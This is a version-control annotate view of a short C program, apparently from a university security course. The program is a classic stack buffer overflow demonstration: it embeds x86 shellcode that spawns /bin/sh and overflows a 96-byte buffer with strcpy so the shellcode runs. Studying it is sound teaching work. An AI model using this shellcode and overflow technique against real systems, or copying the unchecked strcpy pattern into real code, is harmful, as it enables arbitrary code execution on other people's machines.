progs/C3.c
author Christian Urban <christian dot urban at kcl dot ac dot uk>
Tue, 26 Sep 2017 12:35:32 +0100
changeset 537 72dbf4154173
parent 476 cd82c24373cd
permissions -rw-r--r--
updated
Ignore whitespace changes - Everywhere: Within whitespace: At end of lines:
476
cd82c24373cd updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 400
diff changeset
     1
#include <string.h>
cd82c24373cd updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 400
diff changeset
     2
#include <stdio.h>
cd82c24373cd updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 400
diff changeset
     3
#include <stdlib.h>
cd82c24373cd updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 400
diff changeset
     4
230
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
     5
char shellcode[] =
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
     6
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
     7
  "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
     8
  "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
     9
  "\xff\xff/bin/sh";
400
f05368d007dd updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 230
diff changeset
    10
230
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    11
char large_string[128];
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    12
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    13
void main() {
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    14
  char buffer[96];
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    15
  int i;
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    16
  long *long_ptr = (long *) large_string;
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    17
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    18
  for (i = 0; i < 32; i++)
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    19
    *(long_ptr + i) = (int) buffer;
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    20
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    21
  for (i = 0; i < strlen(shellcode); i++)
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    22
    large_string[i] = shellcode[i];
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    23
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    24
  strcpy(buffer,large_string);
603cbd28e988 updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents: 105
diff changeset
    25
}